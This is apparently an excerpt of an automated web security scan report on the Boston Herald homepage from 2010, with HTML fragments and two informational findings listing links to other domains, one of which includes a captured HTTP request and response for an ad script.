<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">
    <IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<a href="/business/real_estate/view/20101108salvatore_lupoli/srvc=home&position=4"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/b6c328_sal_11082010.jpg" alt="LAWRENCE REVIVAL: Salvatore Lupoli, chief executive of Sal’s Pizza, displays an aerial photo of his Riverwalk Properties
complex, where he has started on a second phase of construction."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/business/real_estate/view/20101108salvatore_lupoli/format=comments&srvc=home&position=4">
...[SNIP]...
<a href="/news/regional/view/20101109close_shave_for_wife_killer_doc_transsexual_just_needs_more_razors/srvc=home&position=5"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/0b646b_killer_11082010.jpg" alt="Robert ‘Michele’ Kosilek."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20101109close_shave_for_wife_killer_doc_transsexual_just_needs_more_razors/format=comments&srvc=home&position=5">
...[SNIP]...
<a href="/track/inside_track/view/20101108because_sassy_gay_friend_says_so/srvc=home&position=6"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/b9b0fc_sassy_11082010.jpg" alt="‘Sassy Gay Friend’ YouTube star Brian Gallivan."></a>
...[SNIP]...
<a href="/entertainment/television/general/view/20101108hot_coco_timing_is_ideal_for_conans_return_to_late-night_wars/srvc=home&position=7"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/c595ca_ltpconan20101108.jpg" alt="Conan O’Brien returns tonight with “Conan,” running Monday through Thursdays at 11 p.m. on TBS."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/television/general/view/20101108hot_coco_timing_is_ideal_for_conans_return_to_late-night_wars/format=comments&srvc=home&position=7">
...[SNIP]...
<a href="/sports/football/other_nfl/view.bg?articleid=1294845&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20101108/stp/590145_aaron_11082010.jpg" alt=""></a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1294174&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20101105/stp/b3cddd_dwoodhead11052010.jpg" alt=""></a>
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery">
<a class="blockOneBlue" href="/news/columnists/view.bg?articleid=1294174&srvc=home&position=rated">
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Poll">
<a class="blockOneBlue" href="/news/columnists/view.bg?articleid=1294174&srvc=home&position=rated">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1288456&format=comments&srvc=home&position=emailed">
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div id="next-arrow-container">
<img alt="More" id="SliderMoreButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif" />
</div>
    <div id="prev-arrow-container">
<img alt="Back" id="SliderBackButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif" />
<!--//
<img id="ShadowLeft" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderShadowLeft.png" alt="" />
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg" />
<div class="sliderTitle" style="color:#630">
...[SNIP]...
<a href="/blogs/sports/high_school"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png" />
<div class="sliderTitle" style="color: #039">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordan_177x57.gif" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/on_the_t/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg" /></a>
...[SNIP]...
<li class="SliderItem">
<img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif" alt="Your tax dollars at work" />
<div style="line-height:16px">
...[SNIP]...
<a href="http://www.bostonherald.com/search/?topic=scholz&searchSite=recent&x=0&y=0#articleFull"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/shopping/half_price_boston/" style="color:#333; font-weight:bold"><img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/news/police_logs/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/projects/mcas2009?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/users/register?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="/store/">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.shoplocal.com/bostonherald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/about/home_delivery/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.collegeanduniversity.net/herald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2010/11/07/vince-wilfork-on-todays-performance-we-played-the-way-we-practiced-like-crap/"><img src="http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2010/11/vince-wilfork.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2010/11/05/illegal-downloader-jammie-thomas-rasset-hit-with-15-million-fine/"><img src="http://multimedia.heraldinteractive.com/images/419a149cad_music07072009.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/lifestyle/behind_the_wheel/?p=1147"><img src="http://cache.heraldinteractive.com/blogs/lifestyle/behind_the_wheel/wp-content/uploads/2010/11/nashstreetrod.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/celtics/index.php/2010/11/06/postgame-notes-from-another-wild-night-at-the-garden/"><img src="http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2010/11/rondofeet.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant/?p=2210"><img src="http://images.nymag.com/images/2/daily/2010/11/05_privatepractice_560x375.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2010/11/07/british-fear-factor-over-bay-state-jails/"><img src="http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2010/11/neil-entwistle.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/high_school/index.php/2010/11/05/fridays-high-school-football-schedule-2/"><img src="http://cache.heraldinteractive.com/blogs/sports/high_school/wp-content/uploads/2010/11/img_0192.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/red_sox/index.php/2010/11/07/money-matters-taking-a-look-at-red-sox-payroll/"><img src="http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2010/11/theoheraldfile.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/lifestyle/fork_lift/?p=2367"><img src="http://cache.heraldinteractive.com/blogs/lifestyle/fork_lift/wp-content/uploads/2010/11/efd7c5_ltpback20101105-300x261.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="/sports/baseball/other_mlb/view.bg?articleid=1294857"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101108/2ab65a_clee11082010.jpg"></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('galleries/index.php?gallery_id=9','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/frontpdf_11072010.jpg" alt="" /></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=10','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/backpdf_11072010.jpg" alt="" /></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div>+ <a href="http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE">Money Saving Coupons</a>
...[SNIP]...
<div>+ <a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<div>+ <a href="http://www.people2people.com/?connect=boshrld&page=login">Personals</a>
...[SNIP]...
<div>+ <a href="http://www.shoplocal.com/bostonherald/">Great Shopping Deals</a>
...[SNIP]...
<div>+ <a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<a href="/about/electronic_edition/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg" style="border: 1px #333 solid" /></a>
...[SNIP]...
<a
href="/news/regional/view/20101108roxbury_man_dies_after_stabbing_at_liquor_store/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/0b0f8e_stab_11082010.jpg" alt="GRIEVING: A friend hugs Shondell Davis, the aunt of the stabbing victim, in Roxbury yesterday." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20101108roxbury_man_dies_after_stabbing_at_liquor_store/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/weather/"><img src="http://cache.heraldinteractive.com/images/siteImages/weather/19.gif" /></a>
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/18.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/04.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/03.gif" width="57" height="48"/><br />
...[SNIP]...
<a
href="/sports/columnists/view/20101108eric_mangini_outdoes_bill_belichick_student_teaches_lesson/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101108/stp/f0cad3_shake_11082010.jpg" alt="PARTING SHOT: Eric Mangini shakes hands with Bill Belichick after his Browns hammered the Patriots, 34-14, yesterday in Cleveland." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/sports/columnists/view/20101108eric_mangini_outdoes_bill_belichick_student_teaches_lesson/format=comments&srvc=home&position=also">
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=">Schedule</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/individual.aspx?team=028">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077">Schedule</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077">Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=">Schedule</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=">Schedule</a>  |  
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121">Ind. Stats</a>
...[SNIP]...
<a
href="/entertainment/movies/general/view/20101108desperate_hours_franco_spends_time_with_hiker_who_survived_against_the_odds/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/8b11c8_ltpfranco20101107_edited-1.jpg" alt="James Franco in ‘127 Hours.’" /></a>
...[SNIP]...
<a href="/entertainment/arts_culture/view.bg?articleid=1294669&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/3ec29e_07tosc1.jpg" border="0"
width="207" height="181" caption="Romantic, dramatic ‘Tosca’ is a winner" /></a>
...[SNIP]...
<a
href="/track/inside_track/view/20101108tracked_down_michelle_mcgee_ty_law_lou_merloni_and_more/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/4348cc_bomb_11082010.jpg" alt="Michelle ‘Bombshell’ McGee,left, and Revolution Rock Bar bartender Caela Scott." /></a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1294837&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101108/4e5b50_lil_11082010.jpg" border="0"
width="207" height="181" caption="Lil Wayne is free, but at what price?" /></a>
...[SNIP]...
<a
href="/business/general/view/20101108caritas_sale_critic_hits_ethics_board/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/bc9344_coak_11082010.jpg" alt="Martha Coakley." /></a>
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<a
href="/jobfind/news/technology/view/20101108polaroid_goes_back_to_the_future_instant_cameras_set_for_age_of_internet/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/d24c15_pola2_11082010.jpg" alt="REPLAY: The $90 300 Instant Camera(inset) replicates the function of the classic Polaroid camera - more or less, since the printout is about half the size. The $200 Pogo offers both instant and digital photos." /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img src="http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif"></a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.homefind.com/?srvc=home&position=also">Homefind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="featuredListHF_logo">
<img src="http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg" />
    </div>
   <span class="bold">
    <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">
1212 North Main Street,<br>
...[SNIP]...
</span>
        <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">View listing</a>
...[SNIP]...
</div>
<a class="orange" href="http://www.homefind.com">Search Homes</a>  |  
<a class="orange" href="http://www.homefind.com/post-property/">Post a Property</a>  |  
<a class="orange" href="http://www.homefind.com/for-agents/">For Agents</a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.carfind.com/?srvc=home&position=also">Carfind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/">Search Cars</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/sellCar.bg">Sell a Car</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp">Find a dealer</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" style="margin-right:30px;"></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" style="margin-right:30px;"></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif"></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F%3FshowResults%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

8.11. http://bostonherald.com/includes/PointRollAds.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/includes/PointRollAds.htm

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/includes/PointRollAds.htm?pid=1120613S29320101007185847&redir=http://ads.undertone.com/ck.php%3Foaparams=2__bannerid=157484__campaignid=24780__zoneid=1232__UTLCA=1__cb=81ce1ec855874f8bb627e18891a50172__bk=lbjieb__id=16jt93yzfdp12x9z59zal9xo8__oadest=$CTURL$&pub=un1232&time=0|18:22|-6&flash=10&server=portalserve&bu=246791520

The response contains the following link to another domain:

http://psf.pointroll.com/pointroll/script/psf.js

Request

GET /includes/PointRollAds.htm?pid=1120613S29320101007185847&redir=http://ads.undertone.com/ck.php%3Foaparams=2__bannerid=157484__campaignid=24780__zoneid=1232__UTLCA=1__cb=81ce1ec855874f8bb627e18891a50172__bk=lbjieb__id=16jt93yzfdp12x9z59zal9xo8__oadest=$CTURL$&pub=un1232&time=0|18:22|-6&flash=10&server=portalserve&bu=246791520 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:23:00 GMT
Server: Apache
Last-Modified: Thu, 27 Dec 2007 03:06:49 GMT
Accept-Ranges: bytes
Content-Length: 95
Content-Type: text/html; charset=UTF-8
Connection: close

<script type="text/javascript" src="http://psf.pointroll.com/pointroll/script/psf.js"></script>

8.12. http://bostonherald.com/index.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/index.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/index.bg?srvc=home&tab=active

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F&c5=&c6=&c15=
http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/blogs/lifestyle/behind_the_wheel/wp-content/uploads/2010/11/nashstreetrod.jpg
http://cache.heraldinteractive.com/blogs/lifestyle/fork_lift/wp-content/uploads/2010/11/efd7c5_ltpback20101105-300x261.jpg
http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2010/11/neil-entwistle.JPG
http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2010/11/rondofeet.JPG
http://cache.heraldinteractive.com/blogs/sports/high_school/wp-content/uploads/2010/11/img_0192.JPG
http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2010/11/vince-wilfork.jpg
http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2010/11/theoheraldfile.jpg
http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg
http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif
http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif
http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif
http://cache.heraldinteractive.com/images/siteImages/weather/03.gif
http://cache.heraldinteractive.com/images/siteImages/weather/04.gif
http://cache.heraldinteractive.com/images/siteImages/weather/18.gif
http://cache.heraldinteractive.com/images/siteImages/weather/19.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif
